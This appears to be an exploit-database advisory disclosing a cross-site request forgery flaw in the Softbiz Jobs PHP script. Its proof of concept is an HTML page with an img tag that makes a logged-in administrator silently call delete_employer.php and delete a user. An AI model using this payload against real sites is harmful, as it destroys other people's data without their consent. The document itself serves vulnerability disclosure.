Softbiz Jobs - Cross-Site Request Forgery

Author: pratul agrawal
type: webapps
platform: php
port: 
date_added: 2010-02-22 
date_updated:  
verified: 1 
codes: OSVDB-62545 
tags: 
aliases:  
screenshot_url:  
application_url: 

                     =======================================================================

                                         Softbiz Jobs CSRF Vulnerability
                     =======================================================================

                                                     by

                                               Pratul Agrawal


# Vulnerability found in- Admin module

# email         Pratulag@yahoo.com

# company       aksitservices

# Credit by     Pratul Agrawal

# Download      http://www.softbizscripts.com/

# Script        softbizscripts



# Proof of concept

Script to delete the registered user through Cross Site request forgery

             ...................................................................................................................

                        <html>

                          <body>

                              <img src=http://server/scripts/seojobs/admin/delete_employer.php?id=[USER ID] />

                          </body>

                        </html>


             ...................................................................................................................



After execution refresh teh page and u can see that user having id=20 get deleted automatically.


#If you have any questions, comments, or concerns, feel free to contact me.